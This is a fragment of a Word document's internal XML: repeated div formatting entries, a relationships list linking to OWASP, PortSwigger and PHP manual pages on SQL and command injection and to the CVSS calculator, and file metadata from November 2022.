        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="929579573">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1003246375">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1366101498">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1525902855">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1581911051">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1711109117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1762556267">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1854494866">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20490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st.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/security.database.sql-injection.php"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php.net/manual/en/mysqli.quickstart.prepared-statements.php" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/project/pyfiglet/0.7/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><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php.net/manual/en/security.database.sql-injection.php" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.mysql-real-escape-string.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os-command-injection" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/os-command-injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injection" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injection" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/pdo.prepared-statements.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1"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70636-543A-42D5-B0F1-5954501C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3154</Words>
  <Characters>19876</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>165</Lines>
  <Paragraphs>45</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RF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dmitry Petschke</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2022-11-19T22:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-19T22:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-19T22:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>